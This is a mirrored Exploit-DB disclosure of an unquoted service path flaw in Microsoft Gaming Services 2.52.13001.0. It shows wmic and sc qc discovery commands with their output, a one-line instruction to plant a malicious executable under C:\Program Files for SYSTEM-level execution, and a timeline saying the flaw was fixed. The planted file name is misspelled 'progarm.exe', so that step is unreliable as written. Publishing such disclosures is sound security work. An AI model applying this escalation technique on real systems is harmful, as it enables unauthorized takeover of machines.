Microsoft Gaming Services 2.52.13001.0 – Unquoted Service Path

  • 作者: Johto Robbie
    日期: 2022-02-21
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/50776/
  • # Exploit Title: Microsoft Gaming Services 2.52.13001.0 - Unquoted Service Path
    # Discovery by: Johto Robbie
    # Discovery Date: May 12, 2021
    # Tested Version: 2.52.13001.0
    # Vulnerability Type: Unquoted Service Path
    # Tested on OS: Windows 10 x64 Home
    
    # Step to discover Unquoted Service Path:
    
    Go to Start and type cmd. Enter the following command and press Enter:
    
    C:\Users\Bang's>wmic service get name, displayname, pathname, startmode |
    findstr /i "Auto" | findstr /i /v "C:\Windows\" | findstr /i /v """
    
    Gaming Services
    GamingServices C:\Program
    Files\WindowsApps\Microsoft.GamingServices_2.52.13001.0_x64__8wekyb3d8bbwe\GamingServices.exe
    
    
    
    Auto
    
    Gaming Services
    GamingServicesNetC:\Program
    Files\WindowsApps\Microsoft.GamingServices_2.52.13001.0_x64__8wekyb3d8bbwe\GamingServicesNet.exe
    
    
    
     Auto
    
    C:\Users\Bang's>sc qc "GamingServices"
    
    [SC] QueryServiceConfig SUCCESS
    
    SERVICE_NAME: GamingServices
    
    TYPE : 210WIN32_PACKAGED_PROCESS
    
    START_TYPE : 2 AUTO_START
    
    ERROR_CONTROL: 0 IGNORE
    
    BINARY_PATH_NAME : C:\Program
    Files\WindowsApps\Microsoft.GamingServices_2.52.13001.0_x64__8wekyb3d8bbwe\GamingServices.exe
    
    LOAD_ORDER_GROUP :
    
    TAG: 0
    
    DISPLAY_NAME : Gaming Services
    
    DEPENDENCIES : staterepository
    
    SERVICE_START_NAME : LocalSystem
    
    This application have no quote . And it contained in C:\Program Files. Put
    mot malicious aplication with name "progarm.exe"
    
    Stop & Start: GamingServices. "progarm.exe" will be execute
    
    #Exploit:
    
    An unquoted service path in
    Microsoft.GamingServices_2.52.13001.0_x64__8wekyb3d8bbwe, could lead to
    privilege escalation during the installation process that is performed when
    an executable file is registered. This could further lead to complete
    compromise of confidentiality, Integrity and Availability.
    
    #Timeline
    May 12, 2021 - Reported to Microsoft
    Feb 11, 2022 - Confirmed vulnerability has been fixed